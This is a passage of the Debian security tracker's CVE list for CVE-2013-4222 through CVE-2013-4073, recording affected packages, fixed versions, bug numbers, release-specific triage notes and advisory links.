CVE-2013-4222 (OpenStack Identity (Keystone) Folsom, Grizzly 2013.1.3 and earlier, an ...)
	- keystone 2013.1.3-1 (bug #719290)
	[wheezy] - keystone (Vulnerable code not present in Openstack Essex)
	NOTE: http://lists.openstack.org/pipermail/openstack-security/2013-August/000263.html
CVE-2013-4221 (The default configuration of the ObjectRepresentation class in Restlet ...)
	- restlet (bug #596472)
	NOTE: http://blog.diniscruz.com/2013/08/using-xmldecoder-to-execute-server-side.html
	NOTE: https://github.com/o2platform/DefCon_RESTing
CVE-2013-4220 (The bad_mode function in arch/arm64/kernel/traps.c in the Linux kernel ...)
	- linux-2.6 (ARM64 not supported)
	- linux (ARM64 not yet supported)
CVE-2013-4219 (Multiple integer overflows in the Intel WiMAX Network Service through ...)
	- wimax-tools (bug #627975)
CVE-2013-4218 (The InitMethodAndPassword function in InfraStack/OSAgnostic/WiMax/Agen ...)
	- wimax-tools (bug #627975)
CVE-2013-4217 (The OSAL_Crypt_SetEncryptedPassword function in InfraStack/OSDependent ...)
	- wimax-tools (bug #627975)
CVE-2013-4216 (The Trace_OpenLogFile function in InfraStack/OSDependent/Linux/InfraSt ...)
	- wimax-tools (bug #627975)
CVE-2013-4215 (The IPXPING_COMMAND in contrib/check_ipxping.c in Nagios Plugins 1.4.1 ...)
	- nagios-plugins 1.4.16+git20130902-1 (unimportant)
	NOTE: vulnerable code present, but check_ipxping is neither built nor installed
	- monitoring-plugins (Fixed before initial upload to Debian)
	NOTE: contrib/check_ipxping removed from src:monitoring-plugins before the
	NOTE: initial upload to Debian after the source package rename.
CVE-2013-4214 (rss-newsfeed.php in Nagios Core 3.4.4, 3.5.1, and earlier, when MAGPIE ...)
	- nagios3 3.5.1-1 (low; bug #719056)
	[wheezy] - nagios3 (Minor issue)
	[squeeze] - nagios3 (html/rss-newsfeed.php not present)
	NOTE: fixed by removing html/rss-newsfeed.php completely
	NOTE: http://anonscm.debian.org/gitweb/?p=pkg-nagios/pkg-nagios3.git;a=commit;h=c88bef82308c99601732bb9517a1af5bc6928282
CVE-2013-4213 (Red Hat JBoss Enterprise Application Platform (EAP) 6.1.0 does not pro ...)
	- jbossas4 (Only builds a few libraries, not the full application server, #581226)
CVE-2013-4212 (Certain getText methods in the ActionSupport controller in Apache Roll ...)
	NOT-FOR-US: Apache Roller
CVE-2013-4211 (A Code Execution Vulnerability exists in OpenX Ad Server 2.8.10 due to ...)
	NOT-FOR-US: OpenX
CVE-2013-4210 (The org.jboss.remoting.transport.socket.ServerThread class in Red Hat ...)
	NOT-FOR-US: JBoss Remoting
CVE-2013-4209 (Automatic Bug Reporting Tool (ABRT) before 2.1.6 allows local users to ...)
	NOT-FOR-US: abrt is Red Hat / Fedora specific
CVE-2013-4208 (The rsa_verify function in PuTTY before 0.63 (1) does not clear sensit ...)
	{DSA-2736-1}
	- putty 0.63-1
	- filezilla 3.7.3-1 (low; bug #719070)
	[squeeze] - filezilla (Minor issue)
	[wheezy] - filezilla (Minor issue)
	NOTE: http://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/private-key-not-wiped.html
CVE-2013-4207 (Buffer overflow in sshbn.c in PuTTY before 0.63 allows remote SSH serv ...)
	{DSA-2736-1}
	- putty 0.63-1
	- filezilla 3.7.3-1 (low; bug #719070)
	[squeeze] - filezilla (Minor issue)
	[wheezy] - filezilla (Minor issue)
	NOTE: http://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/vuln-bignum-division-by-zero.html
CVE-2013-4206 (Heap-based buffer underflow in the modmul function in sshbn.c in PuTTY ...)
	{DSA-2736-1}
	- putty 0.63-1
	- filezilla 3.7.3-1 (low; bug #719070)
	[squeeze] - filezilla (Minor issue)
	[wheezy] - filezilla (Minor issue)
	NOTE: http://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/vuln-modmul.html
CVE-2013-4205 (Memory leak in the unshare_userns function in kernel/user_namespace.c ...)
	- linux 3.10.7-1
	[wheezy] - linux (Introduced in 3.8)
	- linux-2.6 (Introduced in 3.8)
CVE-2013-4204 (Multiple cross-site scripting (XSS) vulnerabilities in the JUnit files ...)
	- gwt (low)
	[squeeze] - gwt (Minor issue)
	NOTE: http://www.gwtproject.org/release-notes.html#Release_Notes_2_5_1_RC1
CVE-2013-4203 (The self.run_gpg function in lib/rgpg/gpg_helper.rb in the rgpg gem be ...)
	NOT-FOR-US: Ruby Rgpg Gem
CVE-2013-4202 (The (1) backup (api/contrib/backups.py) and (2) volume transfer (contr ...)
	- cinder 2013.1.2-4 (bug #719118)
CVE-2013-4201 (Katello allows remote authenticated users to call the "system remove_d ...)
	NOT-FOR-US: Katello
CVE-2013-4200 (The isURLInPortal method in the URLTool class in in_portal.py in Plone ...)
	NOT-FOR-US: Plone
CVE-2013-4199 ((1) cb_decode.py and (2) linkintegrity.py in Plone 2.1 through 4.1, 4. ...)
	NOT-FOR-US: Plone
CVE-2013-4198 (mail_password.py in Plone 2.1 through 4.1, 4.2.x through 4.2.5, and 4. ...)
	NOT-FOR-US: Plone
CVE-2013-4197 (member_portrait.py in Plone 2.1 through 4.1, 4.2.x through 4.2.5, and ...)
	NOT-FOR-US: Plone
CVE-2013-4196 (The object manager implementation (objectmanager.py) in Plone 2.1 thro ...)
	NOT-FOR-US: Plone
CVE-2013-4195 (Multiple open redirect vulnerabilities in (1) marmoset_patch.py, (2) p ...)
	NOT-FOR-US: Plone
CVE-2013-4194 (The WYSIWYG component (wysiwyg.py) in Plone 2.1 through 4.1, 4.2.x thr ...)
	NOT-FOR-US: Plone
CVE-2013-4193 (typeswidget.py in Plone 2.1 through 4.1, 4.2.x through 4.2.5, and 4.3. ...)
	NOT-FOR-US: Plone
CVE-2013-4192 (sendto.py in Plone 2.1 through 4.1, 4.2.x through 4.2.5, and 4.3.x thr ...)
	NOT-FOR-US: Plone
CVE-2013-4191 (zip.py in Plone 2.1 through 4.1, 4.2.x through 4.2.5, and 4.3.x throug ...)
	NOT-FOR-US: Plone
CVE-2013-4190 (Multiple cross-site scripting (XSS) vulnerabilities in (1) spamProtect ...)
	NOT-FOR-US: Plone
CVE-2013-4189 (Multiple unspecified vulnerabilities in (1) dataitems.py, (2) get.py, ...)
	NOT-FOR-US: Plone
CVE-2013-4188 (traverser.py in Plone 2.1 through 4.1, 4.2.x through 4.2.5, and 4.3.x ...)
	NOT-FOR-US: Plone
CVE-2013-4187 (The Flippy module 7.x-1.x before 7.x-1.2 for Drupal does not properly ...)
	NOT-FOR-US: Flippy Contributed Drupal module
CVE-2013-4186 REJECTED
CVE-2013-4185 (Algorithmic complexity vulnerability in OpenStack Compute (Nova) befor ...)
	- nova 2013.1.2-3 (low; bug #718907)
	[wheezy] - nova (Minor issue)
CVE-2013-4184 (Perl module Data::UUID from CPAN version 1.219 vulnerable to symlink a ...)
	- libdata-uuid-perl (unimportant; bug #718949)
	NOTE: https://github.com/rjbs/Data-UUID/issues/5
	NOTE: Neutralised by kernel temp hardening
CVE-2013-4183 (The clear_volume function in LVMVolumeDriver driver in OpenStack Cinde ...)
	- cinder 2013.1.2-4 (bug #719010)
CVE-2013-4182 (app/controllers/api/v1/hosts_controller.rb in Foreman before 1.2.2 doe ...)
	- foreman (bug #663101)
CVE-2013-4181 (Cross-site scripting (XSS) vulnerability in the addAlert function in t ...)
	NOT-FOR-US: ovirt
CVE-2013-4180 (The (1) power and (2) ipmi_boot actions in the HostController in Forem ...)
	- foreman (bug #663101)
CVE-2013-4179 (The security group extension in OpenStack Compute (Nova) Grizzly 2013. ...)
	- nova 2013.1.3-1
	[wheezy] - nova (Vulnerable code not present)
	NOTE: CVE for incomplete fix applied for CVE-2013-1664
CVE-2013-4178 (The Google Authenticator login module 6.x-1.x before 6.x-1.2 and 7.x-1 ...)
	NOT-FOR-US: GA Login Drupal contributed module
CVE-2013-4177 (The Google Authenticator login module 6.x-1.x before 6.x-1.2 and 7.x-1 ...)
	NOT-FOR-US: GA Login Drupal contributed module
CVE-2013-4176 (mysecureshell 1.31: Local Information Disclosure Vulnerability ...)
	NOT-FOR-US: MySecureShell
CVE-2013-4175 (MySecureShell 1.31 has a Local Denial of Service Vulnerability ...)
	NOT-FOR-US: MySecureShell
CVE-2013-4174 (Multiple cross-site scripting (XSS) vulnerabilities in the Scald modul ...)
	NOT-FOR-US: Scald Drupal contributed module
CVE-2013-4173 (Directory traversal vulnerability in the trend-data daemon (xymond_rrd ...)
	- xymon 4.3.17-2 (bug #717895)
	[wheezy] - xymon (Not remotely exploitable in Debian default config)
	[squeeze] - xymon (Not remotely exploitable in Debian default config)
CVE-2013-4172 (The Red Hat CloudForms Management Engine 5.1 allow remote administrato ...)
	NOT-FOR-US: RedHat CloudForms Management Engine
CVE-2013-4171 (Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller b ...)
	NOT-FOR-US: Apache Roller
CVE-2013-4170 RESERVED
CVE-2013-4169 (GNOME Display Manager (gdm) before 2.21.1 allows local users to change ...)
	- gdm (unimportant)
	- gdm3 (Only affected older gdm < 2.21.1)
	NOTE: In Debian /tmp/.X11-unix is created by /etc/init.d/x11-common
CVE-2013-4168 (Cross-site scripting (XSS) vulnerability in SmokePing 2.6.9 in the sta ...)
	{DLA-348-1}
	- smokeping 2.6.8-2 (low)
	[squeeze] - smokeping (Minor issue)
	NOTE: https://github.com/oetiker/SmokePing/commit/bad9f9c28f0939b269f90072aa4cf41f20f15563
CVE-2013-4167 (Cross-site scripting (XSS) vulnerability in CMS Made Simple (CMSMS) be ...)
	- cmsms (bug #608888)
CVE-2013-4166 (The gpg_ctx_add_recipient function in camel/camel-gpg-context.c in GNO ...)
	- evolution (unimportant)
	NOTE: Regular UI bug, not a security issue.
CVE-2013-4165 (The HTTPAuthorized function in bitcoinrpc.cpp in bitcoind 0.8.1 provid ...)
	- bitcoin 0.8.4-1 (bug #717828)
	NOTE: https://github.com/bitcoin/bitcoin/issues/2838
CVE-2013-4164 (Heap-based buffer overflow in Ruby 1.8, 1.9 before 1.9.3-p484, 2.0 bef ...)
	{DSA-2810-1 DSA-2809-1}
	- ruby1.8 1.8.7.358-9 (bug #730189)
	- ruby1.9.1 1.9.3.484-1 (bug #730178)
	- ruby2.0 2.0.0.353-1 (bug #730190)
	NOTE: https://www.ruby-lang.org/en/news/2013/11/22/heap-overflow-in-floating-point-parsing-cve-2013-4164/
CVE-2013-4163 (The ip6_append_data_mtu function in net/ipv6/ip6_output.c in the IPv6 ...)
	{DSA-2745-1}
	- linux 3.10.5-1
	- linux-2.6 (Introduced in 3.5)
CVE-2013-4162 (The udp_v6_push_pending_frames function in net/ipv6/udp.c in the IPv6 ...)
	{DSA-2906-1 DSA-2745-1}
	- linux 3.10.5-1 (low)
	- linux-2.6 (low)
CVE-2013-4161 (gksu-polkit-0.0.3-6.fc18 was reported as fixing the issue in CVE-2012- ...)
	- gksu-polkit (CVE for improperly applied fix for CVE-2012-5617 on Red Hat)
CVE-2013-4160 (Little CMS (lcms2) before 2.5, as used in OpenJDK 7 and possibly other ...)
	- lcms 1.19.dfsg1-1.3 (low; bug #728208)
	[squeeze] - lcms (Minor issue)
	[wheezy] - lcms 1.19.dfsg2-1.2+deb7u1
	- lcms2 2.2+git20110628-2.3 (bug #714529)
	[wheezy] - lcms2 2.2+git20110628-2.2+deb7u1
	NOTE: https://github.com/mm2/Little-CMS/commit/91c2db7f2559be504211b283bc3a2c631d6f06d9
	NOTE: https://bugzilla.suse.com/show_bug.cgi?id=826097#c9
CVE-2013-4159 (ctdb before 2.3 in OpenSUSE 12.3 and 13.1 does not create temporary fi ...)
	- ctdb 2.5.1+debian0-1 (bug #749840)
	[wheezy] - ctdb (Minor issue)
	[squeeze] - ctdb (Minor issue)
CVE-2013-4158 (smokeping before 2.6.9 has XSS (incomplete fix for CVE-2012-0790) ...)
	- smokeping (fix for CVE-2012-0790/DSA-2651-1 uses regexp from 2.6.9 upstream release)
	NOTE: CVE is for incomplete fix for CVE-2012-0790
	NOTE: Debian package applied already the more complete fix, see #659899
CVE-2013-4157 (Red Hat Storage 2.0 allows local users to overwrite arbitrary files vi ...)
	NOT-FOR-US: Red Hat Storage Server
CVE-2013-4156 (Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to caus ...)
	- libreoffice 1:4.1.0-1 (unimportant)
	[wheezy] - libreoffice (Minor issue)
	- openoffice.org (unimportant)
	NOTE: Harmless crash
CVE-2013-4155 (OpenStack Swift before 1.9.1 in Folsom, Grizzly, and Havana allows aut ...)
	{DSA-2737-1}
	- swift 1.8.0-7 (bug #719008)
CVE-2013-4154 (The qemuAgentCommand function in libvirt before 1.1.1, when a guest ag ...)
	- libvirt 1.1.0-4 (low; bug #717355)
	[squeeze] - libvirt (only affects >= 1.1.0)
	[wheezy] - libvirt (only affects >= 1.1.0)
	NOTE: Introduced by http://libvirt.org/git/?p=libvirt.git;a=commitdiff;h=d47eff88fe50e43a36671f6d8d0eeda52835d5e0 (v1.1.0)
	NOTE: http://openwall.com/lists/oss-security/2013/07/19/12
CVE-2013-4153 (Double free vulnerability in the qemuAgentGetVCPUs function in qemu/qe ...)
	- libvirt 1.1.0-4 (bug #717354)
	[squeeze] - libvirt (Introduced in 1.0.6)
	[wheezy] - libvirt (Introduced in 1.0.6)
	NOTE: http://openwall.com/lists/oss-security/2013/07/19/11
CVE-2013-4152 (The Spring OXM wrapper in Spring Framework before 3.2.4 and 4.0.0.M1, ...)
	{DSA-2842-1}
	- libspring-java 3.0.6.RELEASE-10 (low; bug #720902)
CVE-2013-4151 (The virtio_load function in virtio/virtio.c in QEMU 1.x before 1.7.2 a ...)
	- qemu 2.1+dfsg-1 (low; bug #739589)
	[wheezy] - qemu (Minor issue, hardly exploitable in practice)
	[squeeze] - qemu (Minor issue, hardly exploitable in practice)
	- qemu-kvm (low)
	[wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice)
	[squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice)
CVE-2013-4150 (The virtio_net_load function in hw/net/virtio-net.c in QEMU 1.5.0 thro ...)
	- qemu 2.1+dfsg-1 (low; bug #739589)
	[wheezy] - qemu (Minor issue, hardly exploitable in practice)
	[wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice)
	[squeeze] - qemu (Minor issue, hardly exploitable in practice)
	- qemu-kvm (low)
	[squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice)
CVE-2013-4149 (Buffer overflow in virtio_net_load function in net/virtio-net.c in QEM ...)
	- qemu 2.1+dfsg-1 (low; bug #739589)
	[wheezy] - qemu (Minor issue, hardly exploitable in practice)
	[wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice)
	[squeeze] - qemu (Minor issue, hardly exploitable in practice)
	- qemu-kvm (low)
	[squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice)
CVE-2013-4148 (Integer signedness error in the virtio_net_load function in hw/net/vir ...)
	- qemu 2.1+dfsg-1 (low; bug #739589)
	[wheezy] - qemu (Minor issue, hardly exploitable in practice)
	[wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice)
	[squeeze] - qemu (Minor issue, hardly exploitable in practice)
	- qemu-kvm (low)
	[squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice)
CVE-2013-4147 (Multiple format string vulnerabilities in Yet Another Radius Daemon (Y ...)
	- yardradius (low; bug #714612)
	[squeeze] - yardradius (Minor issue)
	[wheezy] - yardradius (Minor issue)
CVE-2013-4146 RESERVED
CVE-2013-4145 REJECTED
CVE-2013-4144 RESERVED
CVE-2013-4143 (The (1) checkPasswd and (2) checkGroupXlockPasswds functions in xlockm ...)
	- xlockmore
	NOTE: http://openwall.com/lists/oss-security/2013/07/16/8
CVE-2013-4142 REJECTED
CVE-2013-4141 REJECTED
CVE-2013-4140 (Cross-site scripting (XSS) vulnerability in the TinyBox (Simple Splash ...)
	NOT-FOR-US: TinyBox Drupal contributed module
CVE-2013-4139 (The Stage File Proxy module 7.x-1.x before 7.x-1.4 for Drupal allows r ...)
	NOT-FOR-US: Stage File Proxy Drupal contributed module
CVE-2013-4138 (Cross-site scripting (XSS) vulnerability in the Hatch theme 7.x-1.x be ...)
	NOT-FOR-US: Hatch Drupal contributed module
CVE-2013-4137 (Multiple SQL injection vulnerabilities in StatusNet 1.0 before 1.0.2 a ...)
	- statusnet (bug #491723)
CVE-2013-4136 (ext/common/ServerInstanceDir.h in Phusion Passenger gem before 4.0.6 f ...)
	- passenger 3.0.13debian-1.2
	- ruby-passenger 3.0.13debian-1.2 (low; bug #717176)
	[squeeze] - passenger (minor, local, issue)
	[wheezy] - ruby-passenger 3.0.13debian-1+deb7u1
CVE-2013-4135 (The vos command in OpenAFS 1.6.x before 1.6.5, when using the -encrypt ...)
	{DSA-2729-1}
	- openafs 1.6.5-1
CVE-2013-4134 (OpenAFS before 1.4.15, 1.6.x before 1.6.5, and 1.7.x before 1.7.26 use ...)
	{DSA-2729-1}
	- openafs 1.6.5-1
CVE-2013-4133 (kde-workspace before 4.10.5 has a memory leak in plasma desktop ...)
	- kde-workspace 4:4.10.5-3 (unimportant; bug #717180)
	NOTE: https://bugs.kde.org/show_bug.cgi?id=314919
	NOTE: Plain bug, security implication rather far-fetched
CVE-2013-4132 (KDE-Workspace 4.10.5 and earlier does not properly handle the return v ...)
	- kde-workspace 4:4.10.5-3 (bug #717180)
	[wheezy] - kde-workspace (Only exploitable with glibc 2.17)
	- kdebase-workspace (Only exploitable with glibc 2.17)
	NOTE: https://git.reviewboard.kde.org/r/111261/
	NOTE: https://projects.kde.org/projects/kde/kde-workspace/repository/revisions/45b7f137fbc0b942fd2c9b4e8d8c1f0293e64ba7
	NOTE: only relevant with eglibc >= 2.17.
CVE-2013-4131 (The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through ...)
	- subversion 1.7.13-1 (bug #717794)
	[squeeze] - subversion (Only affects >= 1.7)
	[wheezy] - subversion (Only affects >= 1.7)
CVE-2013-4130 (The (1) red_channel_pipes_add_type and (2) red_channel_pipes_add_empty ...)
	{DSA-2839-1}
	- spice 0.12.4-0nocelt1 (low; bug #717030)
	[wheezy] - spice (Minor issue)
CVE-2013-4129 (The bridge multicast implementation in the Linux kernel through 3.10.3 ...)
	- linux (Introduced in 3.11-rc1)
	- linux-2.6 (Introduced in 3.11-rc1)
CVE-2013-4128 (Red Hat JBoss Enterprise Application Platform (EAP) 6.1.0 does not pro ...)
	- jbossas4 (Only builds a few libraries, not the full application server, #581226)
CVE-2013-4127 (Use-after-free vulnerability in the vhost_net_set_backend function in ...)
	- linux 3.10.5-1
	[wheezy] - linux (Introduced in 3.8)
	- linux-2.6 (Introduced in 3.8)
CVE-2013-4126 RESERVED
CVE-2013-4125 (The fib6_add_rt2node function in net/ipv6/ip6_fib.c in the IPv6 stack ...)
	- linux 3.10.5-1
	[wheezy] - linux (Introduced in 3.7)
	- linux-2.6 (Introduced in 3.7)
CVE-2013-4124 (Integer overflow in the read_nttrans_ea_list function in nttrans.c in ...)
	- samba 2:3.6.17-1 (low)
	[wheezy] - samba 2:3.6.6-6+deb7u1
	[squeeze] - samba 2:3.5.6~dfsg-3squeeze10
	- samba4 (low)
	[wheezy] - samba4 4.0.0~beta2+dfsg1-3.2+deb7u1
	NOTE: https://www.samba.org/samba/security/CVE-2013-4124
	NOTE: samba as per 2:4.0.9+dfsg-2 is the first upload of the unified samba 4.x package to unstable.
	NOTE: Issue also fixed in 4.0.8 upstream, thus the fix still contained in 4.x in unstable
CVE-2013-4123 (client_side_request.cc in Squid 3.2.x before 3.2.13 and 3.3.x before 3 ...)
	- squid (Only affects 3.2 onwards)
	- squid3 3.3.8-1 (bug #716743)
	[wheezy] - squid3 (Only affects 3.2 onwards)
	[squeeze] - squid3 (Only affects 3.2 onwards)
	NOTE: http://www.squid-cache.org/Advisories/SQUID-2013_3.txt
CVE-2013-4122 (Cyrus SASL 2.1.23, 2.1.26, and earlier does not properly handle when a ...)
	{DSA-3368-1}
	- cyrus-sasl2 2.1.26.dfsg1-14 (bug #716835; bug #784112)
	[wheezy] - cyrus-sasl2 (Only exploitable with eglibc 2.17 and later)
	[squeeze] - cyrus-sasl2 (Only exploitable with eglibc 2.17 and later)
	NOTE: http://openwall.com/lists/oss-security/2013/07/12/3
	NOTE: http://git.cyrusimap.org/cyrus-sasl/commit/?id=dedad73e5e7a75d01a5f3d5a6702ab8ccd2ff40d
	NOTE: https://bugzilla.cyrusimap.org/show_bug.cgi?id=3803
	NOTE: https://bugzilla.cyrusimap.org/show_bug.cgi?id=3806
	NOTE: Was originally already fixed in 2.1.25.dfsg1-14 (cf. #716835)
CVE-2013-4121 REJECTED
CVE-2013-4120 (Katello has a Denial of Service vulnerability in API OAuth authenticat ...)
	NOT-FOR-US: Katello
CVE-2013-4119 (FreeRDP before 1.1.0-beta+2013071101 allows remote attackers to cause ...)
	- freerdp (The server part is not built)
	NOTE: https://github.com/FreeRDP/FreeRDP/commit/0773bb9303d24473fe1185d85a424dfe159aff53
	NOTE: Server disabled: option(WITH_SERVER "Build server binaries" OFF) in CMakeLists.txt
CVE-2013-4118 (FreeRDP before 1.1.0-beta1 allows remote attackers to cause a denial o ...)
	- freerdp (The server part is not built)
	NOTE: https://github.com/FreeRDP/FreeRDP/commit/7d58aac24fe20ffaad7bd9b40c9ddf457c1b06e7
	NOTE: Server disabled: option(WITH_SERVER "Build server binaries" OFF) in CMakeLists.txt
CVE-2013-4117 (Cross-site scripting (XSS) vulnerability in includes/CatGridPost.php i ...)
	NOT-FOR-US: WordPress plugin category-grid-view-gallery
CVE-2013-4116 (lib/npm.js in Node Packaged Modules (npm) before 1.3.3 allows local us ...)
	- npm 1.3.10~dfsg-1 (bug #715325)
	NOTE: Upstream fix https://github.com/isaacs/npm/commit/f4d31693
	NOTE: https://github.com/isaacs/npm/issues/3635
CVE-2013-4115 (Buffer overflow in the idnsALookup function in dns_internal.cc in Squi ...)
	- squid (Only affects 3.2 onwards)
	- squid3 3.3.8-1 (bug #716743)
	[wheezy] - squid3 (Only affects 3.2 onwards)
	[squeeze] - squid3 (Only affects 3.2 onwards)
	NOTE: http://www.squid-cache.org/Advisories/SQUID-2013_2.txt
CVE-2013-4114 (The automatic update request in Nagstamont before 0.9.10 uses a cleart ...)
	- nagstamon 0.9.9-2 (low; bug #716718)
	[wheezy] - nagstamon (Minor issue)
	[squeeze] - nagstamon (Minor issue)
	NOTE: update checks are disabled in Debian by default, see debian/patches/check-for-new-version.patch
CVE-2013-4113 (ext/xml/xml.c in PHP before 5.3.27 does not properly consider parsing ...)
	{DSA-2723-1}
	- php5 5.5.0+dfsg-15 (bug #717139)
CVE-2013-4112 (The DiagnosticsHandler in JGroup 3.0.x, 3.1.x, 3.2.x before 3.2.9, and ...)
	- libjgroups-java 2.12.2.Final-4 (bug #717031)
	[wheezy] - libjgroups-java (Minor issue)
	[squeeze] - libjgroups-java (Minor issue)
	NOTE: libjgroups-java/2.12.2.Final-4 disables diagnostic probing by default
CVE-2013-4111 (The Python client library for Glance (python-glanceclient) before 0.10 ...)
	- python-glanceclient 1:0.9.0-2 (bug #718282)
CVE-2013-4110 (Cryptocat has an Unspecified Chat Participant User List Disclosure ...)
	NOT-FOR-US: Cryptocat
CVE-2013-4109 (An unspecified cross-site scripting (XSS) vulnerability exists in Cryp ...)
	NOT-FOR-US: Cryptocat
CVE-2013-4108 (Multiple unspecified vulnerabilities in Cryptocat Project Cryptocat 2. ...)
	NOT-FOR-US: Cryptocat
CVE-2013-4107 (Cryptocat before 2.0.22: cryptocat.js handlePresence() has cross site ...)
	NOT-FOR-US: Cryptocat
CVE-2013-4106 (A Cross-site scripting (XSS) vulnerability exists in Conversation Over ...)
	NOT-FOR-US: Cryptocat
CVE-2013-4105 (Cryptocat before 2.0.22 has Multiparty Encryption Scheme Information D ...)
	NOT-FOR-US: Cryptocat
CVE-2013-4104 (Cryptocat before 2.0.22 has weak encryption in the Socialist Millionna ...)
	NOT-FOR-US: Cryptocat
CVE-2013-4103 (Cryptocat before 2.0.22 has Remote Script Injection due to improperly ...)
	NOT-FOR-US: Cryptocat
CVE-2013-4102 (Cryptocat before 2.0.22 strophe.js Math.random() Random Number Generat ...)
	NOT-FOR-US: Cryptocat
CVE-2013-4101 (Cryptocat before 2.0.22 Link Markup Decorator HTML Handling Weakness ...)
	NOT-FOR-US: Cryptocat
CVE-2013-4100 (Cryptocat before 2.0.22 has Remote Denial of Service via username ...)
	NOT-FOR-US: Cryptocat
CVE-2013-4099 (Multiple unspecified vulnerabilities in OpenAL32.dll in JOAL 2.0-rc11, ...)
	NOT-FOR-US: JOGAMP
CVE-2013-4098 (ServerAdmin/ErrorViewer.jsp in DS3 Authentication Server allow remote ...)
	NOT-FOR-US: DS3 Authentication Server
CVE-2013-4097 (ServerAdmin/TestDRConnection.jsp in DS3 Authentication Server allows r ...)
	NOT-FOR-US: DS3 Authentication Server
CVE-2013-4096 (ServerAdmin/TestTelnetConnection.jsp in DS3 Authentication Server allo ...)
	NOT-FOR-US: DS3 Authentication Server
CVE-2013-4095 (plain/actionsets.html in the SecureSphere Operations Manager (SOM) Man ...)
	NOT-FOR-US: Imperva SecureSphere
CVE-2013-4094 (The Key Management feature in the SecureSphere Operations Manager (SOM ...)
	NOT-FOR-US: Imperva SecureSphere
CVE-2013-4093 (The SecureSphere Operations Manager (SOM) Management Server in Imperva ...)
	NOT-FOR-US: Imperva SecureSphere
CVE-2013-4092 (The SecureSphere Operations Manager (SOM) Management Server in Imperva ...)
	NOT-FOR-US: Imperva SecureSphere
CVE-2013-4091 (The SecureSphere Operations Manager (SOM) Management Server in Imperva ...)
	NOT-FOR-US: Imperva SecureSphere
CVE-2013-4090 (Varnish HTTP cache before 3.0.4: ACL bug ...)
	- varnish 3.0.4-1
	NOTE: https://varnish-cache.org/lists/pipermail/varnish-announce/2013-June/000684.html
CVE-2013-4089 RESERVED
CVE-2013-4088 (Kernel/Modules/AgentTicketWatcher.pm in Open Ticket Request System (OT ...)
	{DSA-2712-1}
	- otrs2 3.2.8-1
	[squeeze] - otrs2 2.4.9+dfsg1-3+squeeze4
	NOTE: DSA-2733-1
	NOTE: http://web.archive.org/web/20130827134500/http://www.otrs.com:80/en/open-source/community-news/security-advisories/security-advisory-2013-04/
CVE-2013-4087 RESERVED
CVE-2013-4086 RESERVED
CVE-2013-4085 RESERVED
CVE-2013-4084 RESERVED
CVE-2013-4083 (The dissect_pft function in epan/dissectors/packet-dcp-etsi.c in the D ...)
	{DSA-2709-1}
	- wireshark 1.10.0-1 (bug #711918)
	[squeeze] - wireshark 1.2.11-6+squeeze11
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8717
CVE-2013-4082 (The vwr_read function in wiretap/vwr.c in the Ixia IxVeriWave file par ...)
	{DSA-2709-1}
	- wireshark 1.10.0-1 (bug #711918)
	[squeeze] - wireshark (Only affects 1.8+)
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8760
CVE-2013-4081 (The http_payload_subdissector function in epan/dissectors/packet-http. ...)
	{DSA-2709-1}
	- wireshark 1.10.0-1 (unimportant; bug #711918)
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8733
	NOTE: Not suitable for code injection
CVE-2013-4080 (The dissect_r3_upstreamcommand_queryconfig function in epan/dissectors ...)
	{DLA-497-1}
	- wireshark 1.10.0-1 (unimportant; bug #711918)
	NOTE: no code injection, not treated as a security issue, see README.Debian.security
	[squeeze] - wireshark (Only affects 1.8+)
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8764
CVE-2013-4079 (The dissect_schedule_message function in epan/dissectors/packet-gsm_cb ...)
	{DLA-497-1}
	- wireshark 1.10.0-1 (unimportant; bug #711918)
	NOTE: no code injection, not treated as a security issue, see README.Debian.security
	[squeeze] - wireshark (Only affects 1.8+)
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8730
CVE-2013-4078 (epan/dissectors/packet-rdp.c in the RDP dissector in Wireshark 1.8.x b ...)
	{DSA-2709-1}
	- wireshark 1.10.0-1 (bug #711918)
	[squeeze] - wireshark (Only affects 1.8+)
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7862
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8729
CVE-2013-4077 (Array index error in the NBAP dissector in Wireshark 1.8.x before 1.8. ...)
	{DSA-2709-1}
	- wireshark 1.10.0-1 (bug #711918)
	[squeeze] - wireshark (Only affects 1.8+)
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8697
CVE-2013-4076 (Buffer overflow in the dissect_iphc_crtp_fh function in epan/dissector ...)
	{DSA-2709-1}
	- wireshark 1.10.0-1 (bug #711918)
	[squeeze] - wireshark (Only affects 1.8+)
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7880
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8727
CVE-2013-4075 (epan/dissectors/packet-gmr1_bcch.c in the GMR-1 BCCH dissector in Wire ...)
	{DSA-2709-1}
	- wireshark 1.10.0-1 (bug #711918)
	[squeeze] - wireshark (Only affects 1.8+)
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7664
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8726
CVE-2013-4074 (The dissect_capwap_data function in epan/dissectors/packet-capwap.c in ...)
	{DSA-2709-1}
	- wireshark 1.10.0-1 (bug #711918)
	[squeeze] - wireshark (Vulnerable code not present)
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8725
CVE-2013-4073 (The OpenSSL::SSL.verify_certificate_identity function in lib/openssl/s ...)
	{DSA-2809-1 DSA-2738-1}
